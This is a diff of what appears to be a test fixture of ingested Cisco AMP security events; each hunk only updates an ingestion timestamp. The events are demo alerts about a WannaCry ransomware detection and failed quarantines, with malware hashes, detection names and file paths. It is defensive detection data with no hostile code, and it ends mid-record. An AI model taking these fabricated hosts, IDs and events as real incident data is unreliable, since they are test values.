@@ -866,7 +866,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763824800Z", + "ingested": "2021-12-14T14:40:45.520858757Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -942,7 +942,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763831200Z", + "ingested": "2021-12-14T14:40:45.520859322Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -1018,7 +1018,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763837500Z", + "ingested": "2021-12-14T14:40:45.520859724Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -1094,7 +1094,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763843500Z", + "ingested": "2021-12-14T14:40:45.520860240Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526294\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -1170,7 +1170,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763848400Z", + "ingested": "2021-12-14T14:40:45.520860684Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526293\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -1246,7 +1246,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763852200Z", + "ingested": "2021-12-14T14:40:45.520861083Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526292\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -1322,7 +1322,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763857100Z", + "ingested": "2021-12-14T14:40:45.520861595Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526291\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -1398,7 +1398,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763863200Z", + "ingested": "2021-12-14T14:40:45.520862152Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526288\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -1474,7 +1474,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763869300Z", + "ingested": "2021-12-14T14:40:45.520862551Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526287\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -1550,7 +1550,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763875400Z", + "ingested": "2021-12-14T14:40:45.520862936Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526286\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -1626,7 +1626,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763882300Z", + "ingested": "2021-12-14T14:40:45.520863328Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558988\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -1702,7 +1702,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763886500Z", + "ingested": "2021-12-14T14:40:45.520863720Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558989\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -1778,7 +1778,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763891900Z", + "ingested": "2021-12-14T14:40:45.520864199Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558987\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -1854,7 +1854,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763897100Z", + "ingested": "2021-12-14T14:40:45.520864696Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558986\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -1930,7 +1930,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763903200Z", + "ingested": "2021-12-14T14:40:45.520865091Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558985\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -2006,7 +2006,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763909300Z", + "ingested": "2021-12-14T14:40:45.520865479Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -2101,7 +2101,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763919Z", + "ingested": "2021-12-14T14:40:45.520865898Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":461000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -2198,7 +2198,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763924600Z", + "ingested": "2021-12-14T14:40:45.520866292Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":430000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious